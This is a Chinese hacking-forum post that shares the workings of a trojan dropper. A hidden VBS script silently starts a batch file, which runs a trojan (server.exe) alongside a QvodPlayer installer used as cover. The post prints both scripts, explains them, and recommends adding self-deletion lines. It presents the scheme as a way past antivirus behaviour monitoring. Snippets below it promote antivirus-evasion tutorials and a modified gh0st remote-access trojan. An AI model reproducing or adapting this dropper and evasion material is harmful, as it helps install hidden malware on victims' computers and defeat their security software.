第三代杀软的主动和行为厉害的没法说,其实不少大牛其实都找到了方法。只是没放出来,小凉谭通过小熊的指引说是一个bat就能搞定。机缘巧合,在登录97ai。com的时候发现他上面有个网址发部器,一看当然知道是木马啦 ,就下了下来是个exe的自解压,拿到虚拟机上解压了一下,发现释放了四个文件,一个是快播的播放器,一个是木马,一个是名为setup.bat的文件,一个是名为setup.vbs的文件,看了一下啊。发现他首先把四个文件都解压到windows目录下,首先运行setup.vbs,通过这个文件调用setup.bat,再通过bat运行播放器和木马。反正留着也没用就发出来共享一下 。
以下是两个主要文件的内容:
setup.bat内容如下
@echo off
server.exe-----------------------------------------------这个是木马名
QvodSetupPlus3.exe------------------------这个是快播安装文件
setup.vbs内容如下
On Error Resume Next
Dim oShell
Set oShell= WScript.CreateObject("WScript.Shell")
a = oShell.Run ("c:\windows\setup.BAT",0)
(这个vbs就是运行bat用的。但我也不明白什么意思?在新手讨论区发了个帖子。很快得到了回答,在这里要感谢一下咱们暗组中的shedream)
说明如下:
On Error Resume Next '如果有错误则进行下一句
Dim oShell '声明变量
Set oShell= WScript.CreateObject("WScript.Shell") '创建一个WScript.shell对象
a = oShell.Run ("",0) '打开一个可执行文件,""号内为程序路径
setup.bat内容如下
@echo off
server.exe-----------------------------------------------这个是木马名
QvodSetupPlus3.exe------------------------这个是快播安装文件
这里 在 加入
del setup.bat
del setup.vbs
比较好点
分享到:
相关推荐
免杀介绍 汇编基础教程(浓缩) 8088汇编手册 经典花指令参考 定位修改与免杀 sys文件简单免杀 asp马免杀 杀毒趋势 主动防御介绍 本文档转自----- ...包括行为,专杀,高级启发的免杀 作者: king QQ:520004949
特征码主要又分为:文件特征码,内存特征码,行为特征码,(主动特征码,如瑞星) B. 同时,又分为:单一特征码和复合特征码; 单一特征码就是说,一个程序中的几句代码被杀毒软件做为识别标志。修改掉一处就可以...
python3 browserscan.pyetc开源的样本大部分可能已经无法免杀,需要自行修改我认为基础核心代码的开源能够帮助想学习的人本人从github大佬项目中学到了很多若用本人项目去进行:HW演练/红蓝对抗/APT/黑产/恶意行为/...
工控安全 工控安全分析闲谈 S7CommPlus 协议研究之动态调试二 解读 NISTIR 8219—确保制造业工控安全:行为异常检测 物联网安全之 MQTT 渗透实战 政企安全 现代化 SOAR 的产品化...从剖析 CS 木马生成到开发免杀工具
当然您够聪明,您会ctrl+c和ctrl+v,您妄图用大量的复制军团冲垮这个锁定的空间,但我不得不告诉您,空间既已锁定,您的行为将完全没有意义。 神说,系统锁定的,复制必将无用。 那些谵妄轻浮的人必将坚强,...
关键位置保护、程序行为和网络行为监控,即便是最新的免杀病毒木马依然无处藏身。 兼容其它杀毒软件,让您享受多层防护 良好的兼容性使之能够与其它杀毒软件可以和平共处,轻松自在地给电脑加个额外保险。 强大的...
基于gh0st 2.5源码编译修改而...过瑞星,Kis6,Kis7(kav),Norton,ZoneAlarm,江民2008 的主动防御 主控端和木马端都为编译而成,纯净无壳 只有SYS驱动文件为手功修改的免杀 屏幕监控..传输速度快,且占对方CPU不到10%
主动防御,可以对试图攻击您个人电脑的恶意行为进行主动识别,并告知您可能存在的风险。 实时监控,可以实时监测您电脑运行过程中的所有进程,将危险扼杀于萌芽状态。 自主查杀,为您提供闪电查杀、全盘查杀、...
此外,360主动防御引擎智能监控系统中进程的危险和有害行为,在恶意程序处于活动状态时,能拦截恶意程序的不良行为,让病毒木马无法作恶。 2. 全新界面,带给您更宽广愉悦的视觉体验 360杀毒2.0版扩大了界面尺寸,...
安全指的是没有危险和风险,免受打探和攻击;安全性也是一种信心的体现,没有怀 疑和担心。在计算机领域,安全性是保证存储在计算机上的数据不被没有权限的人盗取 和访问,绝大多数安全措施涉及到数据加密和口令。 ...